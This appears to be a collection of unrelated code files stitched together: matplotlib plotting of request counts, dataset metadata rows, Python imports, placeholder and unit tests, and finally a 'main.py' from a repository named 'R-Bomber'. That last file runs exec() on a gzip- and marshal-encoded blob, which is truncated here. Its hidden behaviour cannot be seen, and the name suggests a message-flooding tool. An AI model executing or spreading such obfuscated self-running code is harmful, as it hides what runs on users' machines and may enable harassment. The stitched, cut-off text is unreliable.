4, 1, 10, 7, 6, 8, 9, 6, 8, 9, 1, 3, 9, 3, 8, 8, 7, 6, 2, 9, 1, 9, 10, 5, 8, 2, 5, 1, 1, 2, 3, 6, 9, 5, 9, 1, 1, 1, 1, 10, 7, 10, 4, 1, 6, 2, 5, 7, 4, 5, 10, 6, 5, 6, 3, 1, 6, 4, 6, 6, 4, 6, 8, 7, 7, 5, 8, 9, 3, 4, 6, 3, 10, 4, 6, 8, 10, 3, 1, 9, 10, 5, 1, 10, 3, 8, 4, 3, 5, 2, 9, 3, 6, 6, 10, 4, 10, 10, 1, 3, 3, 6, 9, 6, 10, 2, 8, 3, 4, 7, 5, 3, 8, 2, 7, 8, 10, 4, 4, 2, 2, 6, 8, 9, 7, 2, 10, 10, 5, 4, 5, 1, 10, 6, 6, 2, 7, 6, 4, 7, 3, 5, 3, 5, 8, 6, 6, 4, 5, 7, 9, 6, 4, 9, 1, 9, 6, 2, 2, 8, 6, 7, 6, 1, 6, 8, 10, 4, 6, 9, 2, 10, 10, 6, 8, 3, 1, 6, 8, 8, 9, 7, 7, 7, 8, 5, 9, 2, 4, 10, 3, 9, 4, 7, 10, 6, 8, 5, 4, 9, 5, 5, 1, 7, 10, 10, 10, 6, 3, 10, 4, 4, 9, 2, 5, 6, 1, 1, 7, 9, 8, 10, 9, 5, 7, 6, 4, 9, 1, 5, 10, 10, 5, 5, 10, 4, 6, 8, 7, 1, 1, 4, 2, 8, 1, 9, 7, 1, 3, 6, 5, 5, 10, 4, 3, 5, 8, 9, 9, 2, 7, 2, 3, 7, 10, 10, 9, 7, 6, 2, 4, 1, 3, 8, 6, 8, 3, 1, 5, 5, 10, 5, 2, 1, 3, 6, 3, 5, 7, 2, 4, 8, 3, 3, 1, 9, 8, 2, 2, 10, 4, 7, 3, 5, 8, 10, 4, 3, 4, 8, 7, 8, 2, 4, 7, 10, 6, 1, 8, 1, 6, 9, 7, 9, 7, 1, 3, 2, 6, 9, 6, 10, 7, 1, 2, 5, 8, 2, 10, 1, 4, 9, 9, 6, 5, 3, 9, 4, 1, 7, 8, 10, 2, 6, 2, 4, 8, 5, 2, 2, 5, 4, 1, 4, 3, 2, 9, 2, 5, 6, 2, 8, 2, 4, 10, 2, 5, 1, 1, 2, 6, 5, 8, 7, 10, 1, 1, 4, 9, 5, 10, 10, 5, 8, 7, 7, 10, 10, 4, 7, 2, 3, 5, 8, 9, 4, 8, 3, 10, 3, 3, 5, 3, 7, 2, 4, 3, 2, 8, 10, 10, 2, 6, 9, 7, 1, 5, 6, 10, 8, 4, 5, 8, 2, 7, 4, 3, 10, 8, 9, 9, 5, 3, 2, 4, 6, 9, 8, 6, 10, 1, 9, 6, 1, 4, 3, 6, 1, 6, 1, 5, 7, 7, 10, 2, 7, 1, 7, 7, 2, 4, 4, 10, 1, 7, 1, 1, 7, 5, 2, 2, 5, 7, 6, 9, 4, 1, 5, 2, 10, 4, 3, 3, 10, 7, 1, 9, 9, 3, 3, 5, 9, 3, 6, 2, 2, 10, 2, 6, 8, 3, 3, 3, 4, 1, 8, 1, 4, 4, 9, 2, 7, 10, 3, 4, 7, 2, 3, 10, 4, 4, 7, 5, 4, 10, 2, 7, 3, 8, 5, 3, 1, 1, 1, 6, 6, 10, 1, 3, 9, 3, 5, 6, 10, 1, 8, 6, 10, 8, 10, 3, 9, 6, 8, 1, 6, 4, 2, 8, 9, 2, 5, 9, 4, 9, 4, 8, 7, 10, 4, 10, 9, 8, 10, 6, 3, 2, 10, 4, 5, 10, 9, 6, 4, 10, 5, 1, 3, 7, 4, 3, 7, 6, 9, 7, 8, 10, 6, 2, 4, 8, 6, 5, 1, 6, 6, 8, 1, 2, 7, 8, 7, 10, 7, 9, 8, 1, 6, 3, 1, 1, 5, 9, 1, 1, 3, 3, 3, 1, 6, 9, 6, 10, 5, 4, 5, 10, 2, 9, 5, 2, 2, 7, 6, 1, 5, 3, 4, 6, 1, 2, 6, 3, 4, 1, 8, 5, 2, 2, 7, 7, 4, 8, 1, 4, 1, 8, 9, 2, 5, 6, 10, 8, 8, 7, 4, 10, 6, 8, 3, 7, 5, 8, 4, 4, 5, 3, 4, 5, 6, 10, 7, 7, 7, 9, 4, 1, 6, 5, 6, 7, 6, 10, 3, 10, 3, 3, 2, 2, 4, 6, 1, 5, 9, 9, 9, 6, 9, 7, 6, 2, 5, 10, 10, 4, 2, 4, 7, 10, 4, 5, 10, 1, 5, 4, 7, 4, 1, 9, 2, 3, 7, 6, 9, 9, 5, 2, 1, 4, 6, 2, 7, 1, 4, 4, 6, 8, 9, 3, 4, 2, 4, 10, 9, 4, 8, 9, 5, 6, 9, 3, 3, 6, 7, 10, 7, 3, 5, 9, 5, 10, 3, 9, 10, 9, 6, 10, 7, 1, 4, 8, 7, 4, 10, 8, 3, 3, 10, 6, 1, 10, 1, 1, 1, 7, 6, 6, 2, 5, 6, 8, 10, 7, 4, 4, 9, 8, 2, 1, 1, 10, 2, 10, 9, 9, 7, 4, 6, 4, 7, 7, 8, 9, 9, 1, 9, 6, 10, 9, 6, 8, 5, 6, 9, 3, 6, 1, 10, 4, 7, 10, 1, 6, 8, 4, 3, 9, 1, 2, 2, 2, 10, 1, 7, 6, 8, 6, 1, 6, 6, 6, 10, 5, 9, 9, 5, 4, 9, 9, 1, 3, 10, 7, 3, 1, 4, 5, 9, 1, 1, 8, 3, 6, 6, 10, 5, 9, 5, 4, 9, 4, 7, 8, 7, 4, 8, 4, 4, 2, 9, 10, 9, 5, 3, 5, 7, 3, 8, 6, 3, 9, 2, 6, 9, 7, 6, 2, 3, 3, 10, 9, 3, 4, 3, 8, 9, 6, 2, 3, 9, 6, 8, 3, 5, 8, 3, 2, 10, 3, 3, 2, 1, 2, 1, 2, 8, 7, 6, 4, 6, 4, 5, 1, 2, 5, 1, 8, 10, 6, 2, 7, 6, 4, 3, 4, 6, 9, 1, 1, 8, 8, 3, 10, 3, 10, 9, 4, 4, 9, 10, 8, 1, 2, 7, 6, 4, 1, 5, 8, 10, 2, 3, 5, 8, 4, 6, 8, 2, 7, 3, 4, 8, 9, 3, 4, 8, 1, 10, 8, 5, 6, 8, 4, 9, 10, 3, 8, 5, 9, 8, 7, 3, 9, 2, 9, 9, 3, 3, 5, 5, 4, 6, 10, 6, 5, 6, 6, 7, 9, 10, 9, 9, 1, 8, 8, 8, 9, 7, 10, 9, 9, 7, 1, 8, 9, 2, 7, 9, 4, 5, 1, 4, 7, 1, 2, 3, 8, 7, 2, 7, 4, 9, 1, 3, 10, 10, 3, 1, 1, 4, 2, 8, 4, 5, 2, 4, 7, 5, 7, 6, 9, 6, 8, 8, 10, 3, 9, 5, 8, 2, 3, 4, 3, 5, 10, 5, 8, 10, 9, 4, 7, 4, 10, 5, 1, 2, 9, 8, 3, 6, 5, 8, 4, 7, 3, 5, 6, 6, 1, 9, 7, 7, 9, 8, 10, 7, 5, 6, 9, 6, 4, 9, 9, 6, 10, 1, 5, 2, 4, 7, 9, 3, 3, 4, 2, 6, 3, 1, 8, 5, 10, 9, 7, 5, 9, 10, 5, 7, 7, 8, 7, 6, 9, 4, 3, 6, 1, 7, 7, 9, 1, 3, 7, 8, 3, 9, 6, 2, 5, 5, 1, 8, 2, 3, 9, 7, 5, 9, 6, 7, 4, 3, 4, 7, 2, 1, 1, 4, 6, 2, 9, 8, 3, 2, 8, 2, 5, 1, 3, 6, 1, 6, 7, 3, 3, 1, 3, 6, 10, 1, 6, 5, 4, 3, 6, 7, 8, 3, 6, 2, 3, 5, 9, 9, 9, 2, 10, 10, 1, 3, 4, 10, 8, 5, 10, 4, 2, 1, 7, 3, 2, 10, 6, 4, 3, 4, 4, 7, 8, 5, 2, 4, 4, 6, 9, 8, 8, 4, 4, 6, 9, 4, 7, 6, 4, 8, 8, 10, 2, 10, 6, 4, 3, 10, 2, 10, 6, 10, 9, 8, 2, 3, 9, 5, 3, 3, 2, 8, 1, 2, 1, 9, 4, 5, 4, 8, 9, 10, 10, 8, 7, 10, 3, 3, 1, 1, 10, 8, 2, 5, 8, 4, 7, 9, 6, 3, 6, 6, 4, 2, 2, 3, 9, 6, 7, 4, 8, 4, 9, 7, 1, 8, 4, 7, 5, 7, 4, 2, 5, 5, 5, 1, 6, 6, 3, 7, 6, 7, 1, 9, 8, 5, 6, 10, 6, 8, 6, 5, 3, 2, 3, 9, 5, 2, 5, 6, 2, 6, 8, 9, 4, 7, 9, 7, 10, 1, 5, 10, 9, 4, 9, 8, 4, 1, 7, 10, 4, 3, 10, 9, 6, 10, 10, 9, 10, 10, 4, 9, 5, 5, 8, 9, 8, 5, 9, 5, 7, 7, 9, 9, 10, 4, 6, 6, 7, 10, 5, 3, 8, 10, 5, 2, 3, 3, 5, 7, 9, 10, 6, 6, 5, 6, 8, 4, 10, 1, 9, 7, 1, 7, 4, 6, 5, 7, 10, 1, 9, 2, 3, 1, 3, 5, 8, 9, 9, 10, 8, 3, 8, 3, 5, 3, 10, 8, 10, 5, 2, 5, 10, 5, 5, 10, 10, 10, 10, 9, 5, 6, 2, 8, 2, 2, 10, 2, 3, 9, 4, 7, 8, 7, 8, 5, 9, 4, 10, 2, 6, 9, 9, 7, 1, 7, 6, 7, 10, 10, 1, 2, 8, 7, 4, 1, 5, 8, 5, 6, 10, 5, 10, 4, 1, 4, 9, 5, 1, 3, 3, 10, 6, 2, 5, 7, 5, 1, 6, 10, 4, 8, 1, 9, 2, 7, 10, 6, 5, 5, 9, 2, 3, 8, 7, 9, 9, 6, 6, 4, 8, 8, 8, 3, 6, 10, 5, 8, 6, 3, 7, 8, 4, 6, 1, 7, 3, 10, 3, 8, 9, 1, 7, 5, 7, 2, 5, 8, 6, 4, 8, 4, 1, 4, 10, 6, 9, 2, 2, 3, 7, 8, 6, 3, 10, 9, 2, 2, 3, 1, 3, 1, 1, 5, 8, 2, 5, 3, 7, 2, 8, 3, 8, 5, 1, 1, 2, 1, 10, 4, 10, 6, 4, 5, 4, 4, 5, 4, 1, 4, 4, 3, 5, 2, 1, 1, 6, 8, 10, 2, 10, 5, 6, 8, 10, 3, 2, 8, 4, 2, 4, 2, 9, 9, 6, 9, 1, 2, 6, 9, 10, 2, 1, 6, 9, 10, 3, 4, 9, 6, 2, 7, 1, 7, 3, 4, 4, 4, 8, 8, 7, 2, 4, 9, 8, 2, 3, 3, 4, 7, 1, 10, 10, 8, 9, 5, 2, 7, 5, 5, 5, 3, 5, 9, 6, 10, 9, 8, 1, 8, 6, 2, 4, 8, 4, 7, 8, 8, 1, 9, 6, 6, 5, 10, 7, 7, 6, 8, 6, 7, 8, 9, 3, 6, 1, 5, 7, 10, 10, 10, 8, 4, 5, 2, 10, 9, 1, 9, 5, 4, 7, 7, 10, 8, 6, 4, 7, 6, 4, 1, 8, 6, 9, 3, 10, 8, 2, 2, 2, 9, 3, 10, 8, 5, 9, 2, 4, 4, 10, 2, 9, 4, 1, 10, 4, 8, 10, 2, 10, 2, 1, 1, 7, 8, 1, 7, 7, 9, 5, 4, 7, 6, 3, 3, 5, 5, 3, 6, 5, 4, 4, 1, 10, 7, 2, 5, 8, 6, 7, 6, 5, 7, 7, 10, 4, 10, 7, 6, 3, 1, 7, 8, 1, 2, 7, 1, 1, 3, 10, 6, 7, 3, 2, 4, 1, 6, 8, 7, 10, 5, 1, 5, 8, 7, 9, 6, 8, 8, 5, 4, 9, 7, 4, 3, 5, 7, 8, 7, 10, 6, 1, 9, 7, 5, 2, 3, 4, 8, 8, 2, 1, 6, 5, 9, 9, 2, 7, 8, 4, 5, 2, 7, 6, 7, 3, 10, 6, 8, 5, 4, 9, 8, 10, 1, 3, 8, 3, 7, 3, 5, 9, 1, 6, 8, 2, 4, 6, 5, 8, 6, 7, 4, 3, 5, 7, 9, 5, 4, 2, 6, 3, 9, 7, 10, 4, 7, 5, 2, 6, 8, 9, 3, 6, 3, 5, 3, 4, 9, 5, 10, 8, 6, 6, 3, 8, 3, 6, 8, 1, 2, 5, 8, 9, 4, 10, 9, 6, 7, 2, 8, 5, 4, 4, 8, 4, 10, 9, 8, 4, 8, 6, 3, 4, 8, 3, 10, 1, 9, 1, 4, 3, 4, 1, 7, 5, 7, 6, 4, 6, 4, 4, 5, 9, 1, 5, 1, 3, 5, 7, 7, 9, 1, 5, 5, 3, 5, 10, 8, 1, 3, 2, 8, 10, 1, 2, 4, 6, 2, 2, 2, 1, 2, 4, 5, 6, 2, 7, 2, 9, 2, 8, 8, 5, 8, 6, 2, 2, 9, 3, 10, 5, 8, 9, 6, 3, 8, 1, 4, 5, 4, 9, 9, 2, 5, 8, 4, 1, 7, 10, 3, 2, 10, 7, 9, 4, 4, 4, 8, 3, 6, 8, 9, 10, 9, 2, 7, 6, 6, 5, 3, 2, 10, 9, 5, 7, 7, 10, 7, 10, 5, 10, 9, 2, 5, 8, 2, 5, 1, 1, 10, 5, 3, 1, 2, 7, 9, 9, 9, 5, 8, 3, 3, 9, 1, 1, 7, 9, 7, 2, 7, 3, 7, 1, 2, 2, 2, 7, 5, 7, 3, 7, 3, 10, 3, 1, 9, 5, 5, 1, 3, 5, 2, 10, 2, 2, 1, 10, 3, 9, 7, 3, 8, 3, 10, 1, 3, 2, 1, 9, 5, 1, 5, 10, 5, 2, 9, 3, 9, 1, 1, 3, 10, 8, 2, 7, 5, 2, 1, 5, 8, 7, 1, 7, 7, 10, 5, 9, 9, 1, 1, 3, 8, 5, 9, 9, 2, 5, 7, 9, 9, 1, 2, 10, 10, 2, 10, 9, 2, 5, 9, 1, 5, 5, 8, 7, 8, 3, 8, 5, 1, 3, 7, 8, 3, 2, 2, 5, 1, 9, 9, 2, 2, 5, 2, 9, 2, 3, 2, 7, 7, 1, 7, 8, 7, 2, 5, 9, 10, 1, 1, 1, 3, 3, 7, 10, 5, 10, 5, 5, 1, 5, 2, 3, 8, 1, 2, 2, 10, 1, 1, 1, 5, 5, 2, 2, 8, 3, 2, 1, 10, 3, 5, 3, 1, 2, 8, 3, 3, 2, 8, 5, 1, 2, 8, 3, 8, 1, 8, 3, 2, 1, 1, 2, 1, 2, 8, 2, 3, 8, 8, 1, 1, 1, 2, 8, 3, 8, 2, 2, 2, 8, 8, 2, 2, 2, 2, 2, 2]
# import matplotlib.pyplot as plt
# fig = plt.figure()
# ax1 = fig.add_subplot(141)
# ax2 = fig.add_subplot(142)
# ax3 = fig.add_subplot(143)
# ax4 = fig.add_subplot(144)
# ax1.hist(mec4)
# ax2.hist(mec5)
# ax3.hist(mec6)
# ax4.hist(mec7)
# plt.show()
import matplotlib.pyplot as plt
fig = plt.figure()
ax1 = fig.add_subplot(241)
ax2 = fig.add_subplot(242)
ax3 = fig.add_subplot(243)
ax4 = fig.add_subplot(244)
ax5 = fig.add_subplot(245)
ax6 = fig.add_subplot(246)
ax7 = fig.add_subplot(247)
ax8 = fig.add_subplot(248)
import numpy as np
color = ['g-.^', 'r-.o','b-.s', 'k-*']
def plot_me(no, y, col, ax, id_):
ids = range(3)
l_ids = range(3,7)
lab = [0,3]
freq = {i: y.count(i) for i in set(y)}
a, b = list(freq.keys()), list(freq.values())
ax.bar(a, b, label=f'{no} MEC', color=col[0], alpha=0.3)
ax.plot([1] + a + [no], [0] + b + [0], col, lw=2, alpha=0.6)
ax.tick_params(axis="x", labelsize=15)
ax.tick_params(axis="y", labelsize=15)
if id_ in lab:
ax.set_ylabel('No of Requests', fontdict={'weight': 'bold', 'size': 18})
if id_ in l_ids:
ax.set_xlabel('No of MECs', fontdict={'weight': 'bold', 'size': 18})
ax.set_xticks(np.arange(min(y), max(y) + 1, 1))
if id_ in ids:
ax.set_title(f"Distribution for {no} MECs", fontdict={'weight': 'bold', 'size': 20})
def plot_text(ax, text):
ax.text(0.6, 1, text, rotation=0, fontsize=70,
ha="center", va="center", bbox=dict(boxstyle="round", facecolor='#FFFFFF', ec='black'))
ax.set_ylim(top=2)
ax.set_xlim(right=2)
ax.axis('off')
axs = [ax2, ax3, ax4, ax6, ax7, ax8]
dt = [mec4, mec7, mec10, h_mec4, h_mec7, h_mec10]
nos = [4,7,10]
for i in range(len(dt)):
plot_me(no=nos[i%3], y=dt[i], col=color[i%3], ax=axs[i], id_=i)
t = {ax1: r'$Exp_1$', ax5: r'$Exp_2$'}
for k,v in t.items():
plot_text(k,v)
plt.show()
| 851.934211
| 13,162
| 0.385794
| 23,754
| 64,747
| 1.049928
| 0.005767
| 0.142662
| 0.213994
| 0.074419
| 0.82923
| 0.75409
| 0.70413
| 0.625662
| 0.610184
| 0.444988
| 0
| 0.490571
| 0.246482
| 64,747
| 75
| 13,163
| 863.293333
| 0.02062
| 0.003537
| 0
| 0
| 0
| 0
| 0.002527
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.04
| 0
| 0.08
| 0
| 0
| 0
| 1
| null | 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4feabff4afd8ecac938dea0048c93421ebe37d49
| 236
|
py
|
Python
|
bot/starpruuuft/__init__.py
|
PruuuGames/StarPruuuft
|
865bc7f897ccb97d1ca4334ea7a1621a38285a35
|
[
"MIT"
] | 1
|
2018-07-07T08:09:44.000Z
|
2018-07-07T08:09:44.000Z
|
bot/starpruuuft/__init__.py
|
PruuuGames/StarPruuuft
|
865bc7f897ccb97d1ca4334ea7a1621a38285a35
|
[
"MIT"
] | null | null | null |
bot/starpruuuft/__init__.py
|
PruuuGames/StarPruuuft
|
865bc7f897ccb97d1ca4334ea7a1621a38285a35
|
[
"MIT"
] | 2
|
2018-07-07T20:32:14.000Z
|
2018-07-08T22:09:37.000Z
|
from .agents import StrategyAgent
from .agents import BaseAgent
from .agents import BuilderAgent
from .agents import WorkerAgent
from .agents import MilitarAgent
from .agents import DefenceAgent
from .agents import AttackAgent
| 26.222222
| 34
| 0.813559
| 28
| 236
| 6.857143
| 0.357143
| 0.364583
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15678
| 236
| 8
| 35
| 29.5
| 0.964824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8b217b9e130c981ce28384615ac103cd5f954d57
| 1,225
|
py
|
Python
|
lambda/us-east-1_alexa-where-is-tim-0a33c80c982c/test_lambda_function.py
|
tdmalone/where-is-tim
|
e32c1cc8c9561b65c76f2e891435c9f0f382b0ce
|
[
"MIT"
] | 1
|
2018-12-30T05:34:43.000Z
|
2018-12-30T05:34:43.000Z
|
lambda/us-east-1_alexa-where-is-tim-0a33c80c982c/test_lambda_function.py
|
tdmalone/where-is-tim
|
e32c1cc8c9561b65c76f2e891435c9f0f382b0ce
|
[
"MIT"
] | null | null | null |
lambda/us-east-1_alexa-where-is-tim-0a33c80c982c/test_lambda_function.py
|
tdmalone/where-is-tim
|
e32c1cc8c9561b65c76f2e891435c9f0f382b0ce
|
[
"MIT"
] | null | null | null |
from pytest import mark
import lambda_function
@mark.skip(reason="TODO: Need to write")
def test_maybe_get_invalid_date_response():
pass
@mark.skip(reason="TODO: Need to write")
def test_get_newest_valid_event():
pass
@mark.skip(reason="TODO: Need to write")
def test_get_speech_text_response():
pass
@mark.skip(reason="TODO: Need to write")
def test_GetLocationHandler_can_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_GetLocationHandler_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_FallbackIntentHandler_can_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_FallbackIntentHandler_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_SessionEndedRequestHandler_can_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_SessionEndedRequestHandler_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_CatchAllExceptionHandler_can_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_CatchAllExceptionHandler_handle():
pass
@mark.skip(reason="TODO: Need to write")
def test_RequestLogger_process():
pass
@mark.skip(reason="TODO: Need to write")
def test_ResponseLogger_process():
pass
| 21.491228
| 49
| 0.770612
| 174
| 1,225
| 5.206897
| 0.195402
| 0.11479
| 0.200883
| 0.258278
| 0.856512
| 0.856512
| 0.856512
| 0.856512
| 0.856512
| 0.816777
| 0
| 0
| 0.112653
| 1,225
| 56
| 50
| 21.875
| 0.833487
| 0
| 0
| 0.634146
| 0
| 0
| 0.201797
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.317073
| true
| 0.317073
| 0.04878
| 0
| 0.365854
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
8b45a0b76eb99cfe62d1779128618264700bb5b9
| 3,652
|
py
|
Python
|
test/number_test.py
|
toddsifleet/equals
|
fb2b2a027e5389fdeb2f59e9acbdcacb8a8cdfb4
|
[
"MIT"
] | 38
|
2015-03-18T21:45:33.000Z
|
2020-12-22T11:13:05.000Z
|
test/number_test.py
|
toddsifleet/equals
|
fb2b2a027e5389fdeb2f59e9acbdcacb8a8cdfb4
|
[
"MIT"
] | 8
|
2015-02-12T04:06:37.000Z
|
2022-02-10T08:30:08.000Z
|
test/number_test.py
|
toddsifleet/equals
|
fb2b2a027e5389fdeb2f59e9acbdcacb8a8cdfb4
|
[
"MIT"
] | 4
|
2015-02-25T16:54:00.000Z
|
2016-09-07T20:10:09.000Z
|
from equals import any_number
class TestLessThan(object):
test_obj = any_number.less_than(5)
def test_equals_a_smaller_number(self):
assert self.test_obj == 4
def test_does_not_equal_same_number(self):
assert not self.test_obj == 5
def test_does_not_equal_larger_number(self):
assert not self.test_obj == 6
def test_order_of_test_does_not_matter(self):
assert 4 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"less than 5"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
class TestGreateThan(object):
test_obj = any_number.greater_than(5)
def test_equals_a_larger_number(self):
assert self.test_obj == 6
def test_does_not_equal_same_number(self):
assert not self.test_obj == 5
def test_does_not_equal_smaller_number(self):
assert not self.test_obj == 4
def test_order_of_test_does_not_matter(self):
assert 6 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"greater than 5"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
class TestLessThanOrEqual(object):
test_obj = any_number.less_than_or_equal_to(5)
def test_equal_equals_a_smaller_number(self):
assert self.test_obj == 4
def test_equals_same_number(self):
assert self.test_obj == 5
def test_does_not_equal_larger_number(self):
assert not self.test_obj == 6
def test_order_of_test_does_not_matter(self):
assert 4 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"less than or equal to 5"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
class TestGreateThanOrEqual(object):
test_obj = any_number.greater_than_or_equal_to(5)
def test_equals_a_larger_number(self):
assert self.test_obj == 6
def test_equals_same_number(self):
assert self.test_obj == 5
def test_does_not_equal_smaller_number(self):
assert not self.test_obj == 4
def test_order_of_test_does_not_matter(self):
assert 6 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"greater than or equal to 5"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
class TestBetween(object):
test_obj = any_number.between(1, 3)
def test_equals_value_in_range(self):
assert self.test_obj == 2
def test_does_not_equal_value_larger_than_max(self):
assert not self.test_obj == 4
def test_does_not_equal_value_smaller_than_min(self):
assert not self.test_obj == 0
def test_does_not_equal_value_equal_to_max(self):
assert not self.test_obj == 3
def test_does_not_equal_value_equal_to_min(self):
assert not self.test_obj == 1
def test_order_of_test_does_not_matter(self):
assert 2 == self.test_obj
def test_representation(self):
expected = (
"Any instance of <class 'numbers.Number'> "
"between 1 and 3"
)
assert str(self.test_obj) == expected
assert repr(self.test_obj) == '<Equals {}>'.format(expected)
| 28.53125
| 68
| 0.655531
| 509
| 3,652
| 4.363458
| 0.104126
| 0.116614
| 0.158487
| 0.063035
| 0.917154
| 0.897794
| 0.881135
| 0.774876
| 0.746961
| 0.72715
| 0
| 0.012445
| 0.251917
| 3,652
| 127
| 69
| 28.755906
| 0.800512
| 0
| 0
| 0.633333
| 0
| 0
| 0.095564
| 0
| 0
| 0
| 0
| 0
| 0.355556
| 1
| 0.3
| false
| 0
| 0.011111
| 0
| 0.422222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c94eb607fa4e2d3ae5954ac7a0a9a978cbc8ba1
| 116,615
|
py
|
Python
|
main.py
|
B4BY-DG/R-Bomber
|
bb0915b65fedf16754f67f3b2a6702a2ea3c4257
|
[
"MIT"
] | null | null | null |
main.py
|
B4BY-DG/R-Bomber
|
bb0915b65fedf16754f67f3b2a6702a2ea3c4257
|
[
"MIT"
] | null | null | null |
main.py
|
B4BY-DG/R-Bomber
|
bb0915b65fedf16754f67f3b2a6702a2ea3c4257
|
[
"MIT"
] | null | null | null |
#ENCODE BY RAZOR KENWAY
#YOU CAN TRY THIS DECODE GOD BLESS
import gzip,marshal,zlib,base64,binascii,lzma
try:
exec(gzip.decompress(marshal.loads(b'st\x9f\x00\x00\x1f\x8b\x08\x00\x7f\x9f\xe7a\x02\xffd]\xd7Z\x15M\xb4\xbc?O\x01\x88\n\x820=y\x08\x92$#AD\x04\xb6\xc0DrF@D\x9e\xfd\xec\xaa\xaev\xff\xdf9\x17Fv\x98\x99\xee^\xa1V\xadZ\'\x17\xd7W\xb7\xf7]E~W\xc7\xe1\xe0E~{w\x9c\x9f\x0f\x16\'\x97\xf9]yr2x\xf4|r=\xf8|~R\xfc\xcf\xfd\xed\xef\x91\xfa\xa9.\xfb\xf4\x9a\xa1\xf3\xab\xbc\xba\xeb\xc3\x0b\x86\xaa\xba\xbc\xba\xb8\xbe\xad\xef\xee\xfa\x8a\xf7\xad\'\xd3\xb4\x9e\xd2\xa2\xf5\xe4\xa5\xed_^\xeb)i\xff;k\xff\xaa\x93\xbc\xfd\x1f~\xeb\xa9iZ\xad\xf6\x7f\x05\x9b\xed\xdf\xbc!\xfb\xa2\xbcn\xff\xaaZOU\xfb\x8dE|Q\xb6\x7fO.\xda\xef)\xf9O\xfb\xffU~\xe1^\xd0\xfe\x86\xf6\x8b\x8b\xe6\xdf\x7f\xb8\xbf\xd4\xc1]\xfbo\xf5\xe5\x87\xd6S\x99\xe1C\xda\x1f\xdb\xfe\xda\xa2\xfd\xb5\xa6\xfd\x15\x8d\x8f\xefl\xff\x1d\xd7\x16\xb4\xff]\xd9\xeb\xf3L\xfb\xef\x81\xbdN\x83K,\xd7\xb2?\xed?pU\xed\x8f\xc82{\x95\xeeO|\x95\xe7\x9d\xd8\xf7\xf3~\xdb\xef/\xa2\xf6\x9f\x1eno\xbe\xfd\x9f\xdeG\xfbM\r>\xd1|k\xbf\xbe\xfd\x9e&\xd4\xd7\xb5\xff\xac\x02=\x8d\xf6\x9fi\xd8\xfe\x12/\xe2o\xed\x0bo\x7fk\x9ax\xfaG\x85\x7f\x84\xb8\xc4~|\xa9\x9e\x97W\xdbw{1~}\xb5\xdfS6\xed\xef1\x99\x1e}\xfb\xd1\x95\xed?M\xfb\xbde\xfb\x11\xa4\xed\xef1\tn}\xc1^\x8c\xc9\xeds\xe0\x8b\xda?\xac\x8c^\x1c\xeb\x02C\xfc{\xc4\xbe\x18/\xf2\xc2\xc1\xf6o\x89\xbd\x8d\xa6\x19k\xdf`\x8e\xbf\xdc\x9cL\x9d\xcd\xd8+\xa8\xf0\xd3\xc2\xded\xfbKo\xdb\xff\x93\xe2\xf74\xb5\xdf\xd7\x94\xf6W\xd1\xd8\x87X\xa6\xd9\xb6}\xcc\x1e\x1fGO\xfb\xa5\xed\x1f\xa7\xbe\x9eM\xfbWY\x8cF\xf6\x82\x9a\xf6\x9dU\xd1\xcd\xe6C\xfb\xaf\\\xbf\xedz\xef\'>\x07\x0b_\xe8\xe7\xf8\xe0\xd2^|U\xd9\xbf\x17\xb5\xdd_\xf8y\x86\xab\xc4\xb77\xed\x0f\xcd\xf0\xa6\xe8\xf8\x11\x1b\xd4|\x0b\xce\xba~`\xad\xda/6\xb8\xb2\x05\xdd,.\x1b\x1b.x\xb2\x1f\x9b\xea?K\xa3{\xc1>\n\x96\xf1\x1d+\xed\xdf\xc2\xf3\xf6o\xde\x97{\xbb9\xf00\xf0PJ\xaf}\xd5u\xb3m\xd7\xa6\xccb\xdc\xf5\xf6\x02>\x05?\xa8\xb7\xed3\xc2\x1a\xe0g\xfc\xb3\xc6!i\xbf\x02\xfb\n\x9b7m\xec\n\xa6\xb8\x99\xb4\xde\x9e